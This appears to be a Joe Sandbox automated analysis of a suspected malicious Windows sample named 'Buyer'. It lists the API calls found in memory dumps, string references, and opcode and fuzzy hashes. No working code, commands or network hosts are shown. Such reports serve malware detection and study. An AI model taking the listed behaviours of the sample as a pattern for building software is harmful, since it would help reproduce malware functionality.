                                                                                                    • Opcode ID: 3d12548f6b5dba1e59b4f037231e6d04b30defd8710c4a0977333fd64cf2926e
                                                                                                    • Instruction ID: 12175546a137249c55169677e312ab4abd9b1d0ba8147adb84b4887488a7f3ed
                                                                                                    • Opcode Fuzzy Hash: 3d12548f6b5dba1e59b4f037231e6d04b30defd8710c4a0977333fd64cf2926e
                                                                                                    • Instruction Fuzzy Hash: 0B112A75511218BFDB208F68DC44EEEBBBCEF45750B11446ABC05E7150E271AE51AB60
                                                                                                    Strings
                                                                                                    • Variable must be of type 'Object'., xrefs: 00F9384D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Variable must be of type 'Object'.
                                                                                                    • API String ID: 0-109567571
                                                                                                    • Opcode ID: 45433addd065e94b87791e8d1dcc338dbf7a24bfb771ddf38d463040e5508314
                                                                                                    • Instruction ID: 89c583bacb0c704eb47d8f330615d1b32ff21cda8c16be3adf6eb322a6a66f3a
                                                                                                    • Opcode Fuzzy Hash: 45433addd065e94b87791e8d1dcc338dbf7a24bfb771ddf38d463040e5508314
                                                                                                    • Instruction Fuzzy Hash: 1EC27971E00209CFDB24CF58C881BAEBBB1BF18720F248159ED55AB391D779AD41EB91
                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 00F50492
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Init_thread_footer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1385522511-0
                                                                                                    • Opcode ID: ab23ee14fd3f77129a0cb6ba61cae8ae9d4b1d115005ee3c170d6db17257e778
                                                                                                    • Instruction ID: 6534fddd6d80f04f1b7f5cafbc304476b9e7becf3b0cc6e2ba6c0d52a8d20e73
                                                                                                    • Opcode Fuzzy Hash: ab23ee14fd3f77129a0cb6ba61cae8ae9d4b1d115005ee3c170d6db17257e778
                                                                                                    • Instruction Fuzzy Hash: F5B27D75A04301CFDB24CF18C480B2ABBE1BB99724F24496DED898B351D775EC49EB92
                                                                                                    APIs
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00F609B8
                                                                                                      • Part of subcall function 00F635F4: RaiseException.KERNEL32(?,?,?,00F609DA,?,00000000,?,?,?,?,?,?,00F609DA,00000000,01009728,00000000), ref: 00F63654
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00F609D5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                    • String ID: Unknown exception
                                                                                                    • API String ID: 3476068407-410509341
                                                                                                    • Opcode ID: 6b8bd64a13e3757115774de882a783ab82e4c1e5a70980bb95caf3767b9d1295
                                                                                                    • Instruction ID: e2014e68dcda78f4b4ad98b8679fc426a00e9ac0c7d78f692e3e1e1b837d0f5d
                                                                                                    • Opcode Fuzzy Hash: 6b8bd64a13e3757115774de882a783ab82e4c1e5a70980bb95caf3767b9d1295
                                                                                                    • Instruction Fuzzy Hash: 6DF02234D0020D77CB00BAA4EC5699FB76C5F01320F704124B928960A3EF70DE05E6C1
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00FC8A7C
                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00FC8A83
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00FC8C64
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 146820519-0
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$_strcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 306214811-0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F42A8D: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F42ABE
                                                                                                      • Part of subcall function 00F42A8D: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F42AC6
                                                                                                      • Part of subcall function 00F42A8D: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F42AD1
                                                                                                      • Part of subcall function 00F42A8D: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F42ADC
                                                                                                      • Part of subcall function 00F42A8D: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F42AE4
                                                                                                      • Part of subcall function 00F42A8D: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F42AEC
                                                                                                      • Part of subcall function 00F42AF5: RegisterWindowMessageW.USER32(00000004,?,00F42E40), ref: 00F42B4D
                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F42EE6
                                                                                                    • OleInitialize.OLE32 ref: 00F42F04
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 00F83018
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1986988660-0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F45033: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F45123
                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00F5FCFC
                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F5FD0B
                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F9FBCA
                                                                                                    Similarity
                                                                                                    • API ID: IconNotifyShell_Timer$Kill
                                                                                                    • String ID:
                                                                                                    • API String ID: 3500052701-0
                                                                                                    APIs
                                                                                                    • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,00F7891C,?,01009CB8,0000000C), ref: 00F78A54
                                                                                                    • GetLastError.KERNEL32(?,00F7891C,?,01009CB8,0000000C), ref: 00F78A5E
                                                                                                    • __dosmaperr.LIBCMT ref: 00F78A89
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 490808831-0
                                                                                                    APIs
                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,00F84667,?,00000000,00000000,?,00F7978A,?,?,00000002,00000000), ref: 00F79714
                                                                                                    • GetLastError.KERNEL32(?,00F7978A,?,?,00000002,00000000,?,00F75EB1,?,00000000,00000000,00000002,?,?,?), ref: 00F7971E
                                                                                                    • __dosmaperr.LIBCMT ref: 00F79725
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 2336955059-0
                                                                                                    APIs
                                                                                                    • TranslateMessage.USER32(?), ref: 00F4E11B
                                                                                                    • DispatchMessageW.USER32(?), ref: 00F4E129
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F4E13F
                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00F4E151
                                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00F9225F
                                                                                                    Similarity
                                                                                                    • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3288985973-0
                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 00F51EA6
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Init_thread_footer
                                                                                                    • String ID: CALL
                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                    APIs
                                                                                                    • FindCloseChangeNotification.KERNEL32 ref: 00F6005D
                                                                                                    • LoadLibraryExW.KERNELBASE ref: 00F6006F
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseFindLibraryLoadNotification
                                                                                                    • String ID:
                                                                                                    • API String ID: 1525634188-0
                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                    • Instruction ID: 2a7e21f9be9ab96f52b69268b38f2f72a8c3f63dc81594854d89e3388246a74a
                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                    • Instruction Fuzzy Hash: 5231C771A00105EFC718DF58D480A6AF7A6FF49354B3486A5E40ACB656EB32EDC1EBD0
                                                                                                    APIs
                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F43A5A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconNotifyShell_
                                                                                                    • String ID:
                                                                                                    • API String ID: 1144537725-0
                                                                                                    • Opcode ID: a369b3a7026113de71496427c81c14aceeea34964c3265e447b89f73c90922be
                                                                                                    • Instruction ID: 7df65f3cded13ed1dbe733540c0b960e8f8f9d8d533fcc6cddc0e1039435dc3f
                                                                                                    • Opcode Fuzzy Hash: a369b3a7026113de71496427c81c14aceeea34964c3265e447b89f73c90922be
                                                                                                    • Instruction Fuzzy Hash: 0A3191B09047018FD320DF24D885797BBF8FB49718F10082DE9DA87240E7B9AA44DB92
                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 00F4BD7E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Init_thread_footer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1385522511-0
                                                                                                    • Opcode ID: a0303d4d0a631a375bdbfccf0936f7f09b9afd2bfa9aa99dcc0dd378e019ef65
                                                                                                    • Instruction ID: ee77dc217fcb63a50567467ff36118ce034f2815683047c5fe2d97722be68b25
                                                                                                    • Opcode Fuzzy Hash: a0303d4d0a631a375bdbfccf0936f7f09b9afd2bfa9aa99dcc0dd378e019ef65
                                                                                                    • Instruction Fuzzy Hash: EC326975A002099FDF24CF58C884BBABBB5FF44324F198059ED45AB252CB78ED41EB91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LoadString
                                                                                                    • String ID:
                                                                                                    • API String ID: 2948472770-0
                                                                                                    • Opcode ID: ca6e37e421c79fd7d69de90de8cb70913c2cfe21a60700cdaf770a1497400c05
                                                                                                    • Instruction ID: cd536e95c3e2f54f87a33fdce409df0485b1bb9300379a990745eb5fdb15394f
                                                                                                    • Opcode Fuzzy Hash: ca6e37e421c79fd7d69de90de8cb70913c2cfe21a60700cdaf770a1497400c05
                                                                                                    • Instruction Fuzzy Hash: ECD17E31E0420ADFCB14EF98C982EADBBB5FF48310F144159E915AB291DB34AE41DF90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 905358f0a88a2094b1cea5eacebc8917f924481b4e2c233cc0c38458d0f86593
                                                                                                    • Instruction ID: c21d8807d53a024bc834e7fdecb7da2eb2b199e6e819ef6dd80de1ecb6a489a8
                                                                                                    • Opcode Fuzzy Hash: 905358f0a88a2094b1cea5eacebc8917f924481b4e2c233cc0c38458d0f86593
                                                                                                    • Instruction Fuzzy Hash: EA51D476E00108AFDB10CF68DC51BA97BB2EF86364F1981A8E8089B391C735ED46DB50
                                                                                                    APIs
                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00FAF9F8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BuffCharLower
                                                                                                    • String ID:
                                                                                                    • API String ID: 2358735015-0
                                                                                                    • Opcode ID: eb98db23890528b5432fde8f455aabafd6d9cd47b88a9224a1e31f13a1f762eb
                                                                                                    • Instruction ID: 81ef4e14379ca3a8bccccd721d9dbc6b63dca9ea730d0442bd3d18e037fde445
                                                                                                    • Opcode Fuzzy Hash: eb98db23890528b5432fde8f455aabafd6d9cd47b88a9224a1e31f13a1f762eb
                                                                                                    • Instruction Fuzzy Hash: 5E41B3B2900209AFCB11EFA4CC819EFB7B8EF45354B10453AE51ADB251EB74DE08DB60
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F454A3: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F454F0,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F454AF
                                                                                                      • Part of subcall function 00F454A3: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F454C1
                                                                                                      • Part of subcall function 00F454A3: FreeLibrary.KERNEL32(00000000,?,?,00F454F0,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F454D3
                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F45510
                                                                                                      • Part of subcall function 00F4546C: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F8466F,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F45475
                                                                                                      • Part of subcall function 00F4546C: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F45487
                                                                                                      • Part of subcall function 00F4546C: FreeLibrary.KERNEL32(00000000,?,?,00F8466F,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F4549A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2632591731-0
                                                                                                    • Opcode ID: bbc982493590634b4757a50ee5e6832b1916ab9f1f99038916bc14b6eb34df2e
                                                                                                    • Instruction ID: 0486efc77c0f2c902e537a48716da8e257631fa5314845a7ca3c763342b38996
                                                                                                    • Opcode Fuzzy Hash: bbc982493590634b4757a50ee5e6832b1916ab9f1f99038916bc14b6eb34df2e
                                                                                                    • Instruction Fuzzy Hash: 7811A732700605ABCB14FB64CC12BBD7BB69F41B15F144429F842AA1D2EE789A45BB54
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __wsopen_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 3347428461-0
                                                                                                    • Opcode ID: 5e14381b2558d6cdef951c3162b2d2d10ec7101a6f081a4054f09b094e7b8a04
                                                                                                    • Instruction ID: b40c92774443165374913fd4af528258f67cba88e8e71487bdeb5b9d31de25cd
                                                                                                    • Opcode Fuzzy Hash: 5e14381b2558d6cdef951c3162b2d2d10ec7101a6f081a4054f09b094e7b8a04
                                                                                                    • Instruction Fuzzy Hash: 04114871A0420AAFCB09DF58E94599B7BF5EF48350F10806AFC09AB311EA31DA12DB65
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b78347c3af4faeddaf6041936be61502238db1ea0e0acd99a45db38c25bd97f7
                                                                                                    • Instruction ID: b8fa4aa1e809e0bcb551bf149e53397885717f53e7408c0230cad5cf3814accd
                                                                                                    • Opcode Fuzzy Hash: b78347c3af4faeddaf6041936be61502238db1ea0e0acd99a45db38c25bd97f7
                                                                                                    • Instruction Fuzzy Hash: DFF04C379006145AE6313A2ADC09B6B33A89F43770F108B16F869931C1EF7CD806B6D3
                                                                                                    APIs
                                                                                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00FBF6B1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentVariable
                                                                                                    • String ID:
                                                                                                    • API String ID: 1431749950-0
                                                                                                    • Opcode ID: 2091d944934faa8b7b7c8969624807868543cba705156473a327da19a6a1d4d9
                                                                                                    • Instruction ID: 6697f79220a5fb61de9b4acb9c72bf3c9da995e35ddff3b6eb1c1f6014dad21f
                                                                                                    • Opcode Fuzzy Hash: 2091d944934faa8b7b7c8969624807868543cba705156473a327da19a6a1d4d9
                                                                                                    • Instruction Fuzzy Hash: 91F03175600214AFCB04EB65DC46D9F7BA9EF45720F000055F5059B261EA74AE41DB61
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00F66A59,?,0000015D,?,?,?,?,00F68590,000000FF,00000000,?,?), ref: 00F73BA2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: ClearVariant
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: __fread_nolock
                                                                                                    APIs
                                                                                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F42F70
                                                                                                    Similarity
                                                                                                    • API ID: IconNotifyShell_
                                                                                                    APIs
                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F431A9
                                                                                                      • Part of subcall function 00F47467: _wcslen.LIBCMT ref: 00F4747A
                                                                                                    Similarity
                                                                                                    • API ID: LongNamePath_wcslen
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F43989: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F43A5A
                                                                                                      • Part of subcall function 00F4DCC0: GetInputState.USER32 ref: 00F4DDA7
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F42853
                                                                                                      • Part of subcall function 00F42F14: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F42F70
                                                                                                    Similarity
                                                                                                    • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(00000000,00000000,?,00F80A57,?,?,00000000,?,00F80A57,00000000,0000000C), ref: 00F8070A
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNEL32(?,00FAD57A), ref: 00FAE7DB
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    APIs
                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00F41736
                                                                                                    Similarity
                                                                                                    • API ID: InfoParametersSystem
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FAD98E: FindFirstFileW.KERNEL32(?,?), ref: 00FADA05
                                                                                                      • Part of subcall function 00FAD98E: DeleteFileW.KERNEL32(?,?,?,?), ref: 00FADA55
                                                                                                      • Part of subcall function 00FAD98E: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00FADA66
                                                                                                      • Part of subcall function 00FAD98E: FindClose.KERNEL32(00000000), ref: 00FADA7D
                                                                                                    • GetLastError.KERNEL32 ref: 00FB6398
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                    • String ID:
